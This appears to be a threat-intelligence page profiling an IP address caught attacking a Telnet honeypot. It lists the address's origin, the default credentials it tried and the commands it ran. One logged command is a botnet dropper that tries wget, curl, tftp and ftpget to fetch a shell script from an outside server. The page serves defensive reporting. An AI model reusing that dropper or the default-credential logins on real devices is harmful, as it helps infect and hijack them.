TROYANOSYVIRUS
Active ThreatLOW

176.65.139.161

Country of Origin🇱🇺 LU
First Detection4/28/2026
Last Activity4/28/2026
ISPOffshore LC
🎯
15
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
1
Malware

Geolocation

Country
🇱🇺 LU
City
Unknown
ASN
AS214472
ISP
Offshore LC

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

946057d33e9a225fd639...

Attempted Credentials

🔐admin/1234
1x
🔐root/12345
1x

Executed Commands

$guest2x
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://89.190.158.132:7231/bins.sh || curl -O http://89.190.158.132:7231/bins.sh || busybox wget http://89.190.158.132:7231/bins.sh || busybox tftp 89.190.158.132 -c get bins.sh || busybox tftp -r bins.sh -g 89.190.158.132 -l bins.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 89.190.158.132 bins.sh bins.sh || tftp 89.190.158.132 -c get bins.sh || tftp -r bins.sh -g 89.190.158.132 -l bins.sh || ftpget -v -u anonymous -p anonymou1x
$uname -m1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
22
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:8.9p1

Risk Assessment

25
/100
LowMediumHighCritical